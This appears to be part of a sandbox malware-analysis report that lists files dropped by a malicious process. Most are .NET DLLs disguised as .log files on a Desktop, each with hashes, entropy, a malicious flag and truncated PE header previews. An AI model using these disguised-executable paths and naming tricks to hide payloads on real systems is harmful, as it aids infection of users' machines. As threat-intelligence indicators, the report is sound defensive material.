                                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\gIdVKdin.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\gzGVarPq.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\hkEDPjHT.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.492504448438552
                                                          Encrypted:false
                                                          SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                          MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                          SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                          SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                          SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ihfMljWN.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Users\user\Desktop\ipPePSwT.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.4346552043530165
                                                          Encrypted:false
                                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\jBsEwaTl.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\krBMlBBO.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24576
                                                          Entropy (8bit):5.535426842040921
                                                          Encrypted:false
                                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\kyUMRaig.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\lfFVXOxM.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\mBGunJnb.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\mJqNRsNh.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.492504448438552
                                                          Encrypted:false
                                                          SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                          MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                          SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                          SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                          SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\mrjuDXUe.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.529329139831718
                                                          Encrypted:false
                                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\pVwLeLxF.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\rYiuzuCB.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\sGbclZIy.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\tTFBRhfQ.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\tyuuQYhQ.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\vGpScIbo.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\vOZlGrCu.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\zLibuNkF.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Windows\Media\Characters\088424020bedd6

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (555), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):555
                                                          Entropy (8bit):5.860578028117087
                                                          Encrypted:false
                                                          SSDEEP:12:ZrWy8At2zd8WHJudmOdGj7dk7P2yOR66q/u5VcKIpNo+8quyk:RWLDOGgsB7dKeFRxhDA8p
                                                          MD5:5FDC9DDE29B2598A735DD8A318AA6446
                                                          SHA1:F8E247CBB39EF4E6EC72C4E5E6721E53EA7A3CC5
                                                          SHA-256:CEABE1090F3ED53D19502A9AFB2CA9D202BD623A364C2FBC7BC1D38366B9DDCD
                                                          SHA-512:94CB18B27AD3CF77F7471253C0EFEBAD95C041D9472C65E03EB6F9A3ED53489AB00D5528B39FD5E71504BB91503FA05BCDC8480F974EA1BC6D8D650C7F448020
                                                          Malicious:false
                                                          Preview:eTN5MkiG1jlzHYIca3LRjxMY281UQ6ab4bgLd0r2Z0uLCPN8MeCi8H8rGzCNtO05JJ5p178kMT1sCBVmu3Hv32dxczEoydILAzC3UhGPfcVoPQoFdZc0GEBRqHNC2UwsKqsN9cSNw1QbgyhMK8KYASF6xuMNUDXLqmejhbGBHPDPxju2kA14KXs2kvZOPE2teFv3U7ot1IRvP0IOAUmUMcBS4l9wB2wCXUusx1hmVHCBF6numLO4cigBDd8s82s9WPY4FaaJwA8Ea9N78OJ0o1kyxsoU2zocZCp0isoMuEHbjclEPAuut2VeojHXvGQ7WfpXTWZPj6FjtIOUGkE1E4tgrLL9lRboyKFExOu3leKwwwugUwQLBZ2bwIpIKZoRfbvjCKh2zLPkt6u5apoyBQmYRnSoilsM02RVALdKOXV0KSszYusfv0QOyWRY22TNcDu0oZ4PLejn4wO95cQy3MaAmCgn3ERWEHXGi2K8zdUQQmUCISdZmfUQmuNm3QVGMNjwZHbDRR8a2JtAsdell1uixGeyoiFjHNEDDhnB0aI

                                                          C:\Windows\Media\Characters\conhost.exe

                                                          Download File
